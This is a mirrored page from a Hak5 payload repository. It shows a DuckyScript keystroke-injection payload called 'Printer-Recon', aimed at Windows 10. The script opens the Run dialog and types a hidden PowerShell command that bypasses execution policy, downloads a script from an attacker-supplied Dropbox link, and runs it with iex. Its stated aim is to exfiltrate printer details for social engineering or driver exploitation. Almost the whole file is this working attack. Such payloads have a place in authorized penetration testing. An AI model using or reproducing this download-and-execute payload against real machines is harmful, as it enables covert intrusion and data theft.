mirror of https://github.com/hak5/omg-payloads.git
20 lines
683 B
Plaintext
20 lines
683 B
Plaintext
REM_BLOCK
|
|
Title: Printer-Recon
|
|
Author: atomiczsec
|
|
|
|
Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network
|
|
|
|
Target: Windows 10
|
|
|
|
REM Remember to replace the link with your DropBox shared link for the intended file to download
|
|
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
|
|
END_REM
|
|
|
|
DEFINE #URL <Your Shared link for the intended file>
|
|
|
|
DUCKY_LANG US
|
|
DELAY 2000
|
|
|
|
GUI r
|
|
DELAY 500
|
|
STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URLdl=1; iex $pl |